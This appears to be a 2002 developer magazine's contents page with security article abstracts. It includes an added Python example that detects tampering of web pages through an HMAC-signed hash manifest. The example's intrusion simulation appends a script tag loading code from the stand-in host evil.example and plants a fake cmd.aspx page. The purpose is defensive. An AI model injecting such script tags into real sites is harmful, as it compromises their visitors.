September 2002

Security Tips: Defend Your Code with Top Ten Security Tips Every Developer Must Know

There are many ways to get into trouble when it comes to security. You can trust all code that runs on your network, give any user access to important files, and never bother to check that code on your machine has not changed. You can run without virus protection software, not build security into your own code, and give too many privileges to too many accounts. You can even use a number of built-in functions carelessly enough to allow break-ins, and you can leave server ports open and unmonitored. Obviously, the list continues to grow. What are some of the really important issues, the biggest mistakes you should watch out for right now so that you don't compromise your data or your system? Security experts Michael Howard and Keith Brown present 10 tips to keep you out of hot water.

Michael Howard and Keith Brown

Security in .NET: The Security Infrastructure of the CLR Provides Evidence, Policy, Permissions, and Enforcement Services

The common language runtime of the .NET Framework has its own secure execution model that isn't bound by the limitations of the operating system it's running on. In addition, unlike the old principal-based security, the CLR enforces security policy based on where code is coming from rather than who the user is. This model, called code access security, makes sense in today's environment because so much code is installed over the Internet and even a trusted user doesn't know when that code is safe. In this article, Don Box explains how code access security works in the CLR. He discusses the kinds of evidence required by policy, how permissions are granted, and how policy is enforced by the runtime.

Don Box

Security in IIS 6.0: Innovations in Internet Information Services Let You Tightly Guard Secure Data and Server Processes

Security improvements have been a top priority in the evolution of IIS. IIS 6.0, which will be part of Windows .NET Server, has improved security features and a new approach to server configuration. New security-related tools for IIS, including IIS LockDown, make securing your server against attack easier than ever. The author explains how and why you can shut down services with IIS LockDown. He discusses limiting port access with TCP/IP filtering, controlling how files are served with extension mapping, what's new for Secure Sockets Layer, the use of URLScan, and more.

Wayne Berry

Passport Secure Sign-In: Provide Your Users with Secure Authentication Capabilities Using Microsoft .NET Passport

Secure sign-in, a new feature in version 2.0 of the .NET Passport single sign-in and profile service, will be especially useful for sites containing confidential information or anywhere security is a primary concern, such as banks and medical sites. Secure sign-in is as safe as any SSL-based Web site login used today and provides a way to virtually eliminate vulnerability to replay and dictionary attacks. This article explains secure sign-in and demonstrates how you can implement this feature with very little effort in either ASP using the Passport.Manager COM object or in ASP.NET using the .NET class PassportIdentity.

Michael Kogotkov-Lisin

HTTP Pipelines: Securely Implement Request Processing, Filtering, and Content Redirection with HTTP Pipelines in ASP.NET

ASP.NET is a flexible and extensible framework for server-side HTTP programming. While most people think of ASP.NET in terms of pages served, there is a lower-level infrastructure sitting beneath this page model. The underlying plumbing is based on a pipeline of app, module, and handler objects. Understanding how this pipeline works is key if you want to get the most out of ASP.NET as an HTTP server platform, while making your process more efficient, and keeping your server secure. This article introduces the architecture of the pipeline and shows how you can use it to add sophisticated functionality to an ASP.NET-based app.

Tim Ewald and Keith Brown

Tamper-Resistant Apps: Cryptographic Hash Algorithms Let You Detect Malicious Code in ASP.NET

Cryptographic hash algorithms produce fixed-length output from input of arbitrary length. A given input always produces the same output, called a hash code. Using these algorithms, you can compute a hash code for each file at deployment time and validate it later to ensure that code running on your machine has not been tampered with or otherwise changed. Within ASP.NET you can build a mechanism that validates the hash code fingerprint of every page requested by a client before the page runs. In this article, the author shows how to use hash codes with ASP.NET applications to detect tampering and prevent malicious code from running when tampering is detected.

Jason Coombs
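The following is an added example illustrating the fingerprint-and-validate idea above; it is not code from the article and does not use ASP.NET. It keeps a manifest of expected SHA-256 hash codes for a set of deployed pages, then checks the files on disk against it and classifies each as ok, modified, missing, or unexpected (a file that was never deployed, such as a planted page). The file names, contents and key are constructed for illustration. One point the abstract does not spell out is that a list of hash codes is only as trustworthy as its storage: an attacker who can rewrite a page and can also rewrite its expected hash defeats the check, so the manifest is authenticated here with an HMAC under a key that is assumed to live outside the web content directory.

```python
"""Added example: detect tampering of deployed pages with hash fingerprints.

Not code from the article or from ASP.NET; the file names, contents and key
below are constructed for illustration.
"""
from __future__ import annotations

import hashlib
import hmac

# Constructed sample deployment: file name -> bytes as they would sit on disk.
DEPLOYED_FILES: dict[str, bytes] = {
    "default.aspx": b'<%@ Page Language="C#" %><html><body>Hello</body></html>',
    "login.aspx": b'<%@ Page Language="C#" %><form runat="server">...</form>',
}


def fingerprint(content: bytes) -> str:
    """Fixed-length SHA-256 hex digest; identical input gives an identical digest."""
    return hashlib.sha256(content).hexdigest()


def build_manifest(files: dict[str, bytes]) -> dict[str, str]:
    """Record the expected fingerprint of every file at deployment time."""
    return {name: fingerprint(data) for name, data in files.items()}


def _serialize(manifest: dict[str, str]) -> bytes:
    # Canonical (sorted) encoding so the same manifest always signs identically.
    lines = [f"{name} {digest}" for name, digest in sorted(manifest.items())]
    return "\n".join(lines).encode()


def sign_manifest(manifest: dict[str, str], key: bytes) -> str:
    """HMAC-SHA256 over the manifest.

    A bare list of hashes only helps if whoever can rewrite a page cannot also
    rewrite its expected hash. The key is assumed to be stored where writers of
    the web content directory cannot reach it.
    """
    return hmac.new(key, _serialize(manifest), hashlib.sha256).hexdigest()


def verify_deployment(
    files: dict[str, bytes], manifest: dict[str, str], signature: str, key: bytes
) -> tuple[bool, dict[str, str]]:
    """Return (manifest_trusted, per-file status).

    If the manifest's HMAC does not verify, nothing is trusted and the caller
    should refuse to serve: the expected hashes themselves may have been forged.
    Otherwise each file is 'ok', 'modified', 'missing' (listed but gone) or
    'unexpected' (on disk but never deployed, e.g. a planted page).
    """
    expected_sig = sign_manifest(manifest, key)
    if not hmac.compare_digest(expected_sig, signature):
        return False, {}
    report: dict[str, str] = {}
    for name, digest in manifest.items():
        if name not in files:
            report[name] = "missing"
        elif hmac.compare_digest(fingerprint(files[name]), digest):
            report[name] = "ok"
        else:
            report[name] = "modified"
    for name in files:
        if name not in manifest:
            report[name] = "unexpected"
    return True, report


if __name__ == "__main__":
    key = b"constructed-demo-key-keep-it-off-the-web-root"
    manifest = build_manifest(DEPLOYED_FILES)
    signature = sign_manifest(manifest, key)
    print(verify_deployment(DEPLOYED_FILES, manifest, signature, key))

    # Simulate an intrusion: inject script, plant a page, delete another.
    tampered = dict(DEPLOYED_FILES)
    tampered["login.aspx"] += b"<script src='http://evil.example/x.js'></script>"
    tampered["cmd.aspx"] = b'<%@ Page Language="C#" %>...planted...'
    del tampered["default.aspx"]
    print(verify_deployment(tampered, manifest, signature, key))

    # The attacker regenerates the manifest to match, but lacks the HMAC key.
    forged = build_manifest(tampered)
    print(verify_deployment(tampered, forged, signature, key))
```

In a real deployment the check would run in the request path (in ASP.NET, from a handler or module before the page executes) and refuse to serve anything reported as modified, missing or unexpected, and refuse everything when the manifest itself fails to verify.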


Columns

Editor's Note: Start Your Own Security Push

Earlier this year, Bill Gates outlined a comprehensive vision for trustworthy computing. Simply put, to achieve trustworthy computing developers must pay attention to security and reliability—the two biggest issues facing the world of computing today.

New Stuff: Resources for Your Developer Toolbox

ePresence Inc. and OpenNetwork Technologies, an identity management security company, recently announced a partnership to deliver directory-based security management solutions utilizing Microsoft® Active Directory® as the identity store and Microsoft .

Theresa W. Carey

Web Q&A: Scripting Security

Edited by Nancy Michell

The XML Files: WS-Security, WebMethods, Generating ASP.NET Web Service Classes

Aaron Skonnard

Cutting Edge: Using an Eval Function in Web Services

Web Services are often presented as the perfect tool for programmers. They're interoperable, based on open standards such as SOAP and WSDL, and are fully integrated with the Microsoft® .NET platform.

Dino Esposito

Advanced Basics: Reducing Memory Footprints, Gathering Process Info with MSDNMagProcessMonitor

Ken Spencer

.NET Column: Run-time Serialization, Part 3

This is the third part of my three-part series on serialization. In part one, I showed how to serialize and deserialize objects. I also showed how to define types that allow instances of themselves to be serialized.

Jeffrey Richter

C++ Q&A: Typename, Disabling Keys in Windows XP with TrapKeys

Paul DiLascia

Resource File: Skills Development

Two Microsoft Web sites have been created to assist developers in writing secure code using the latest technology.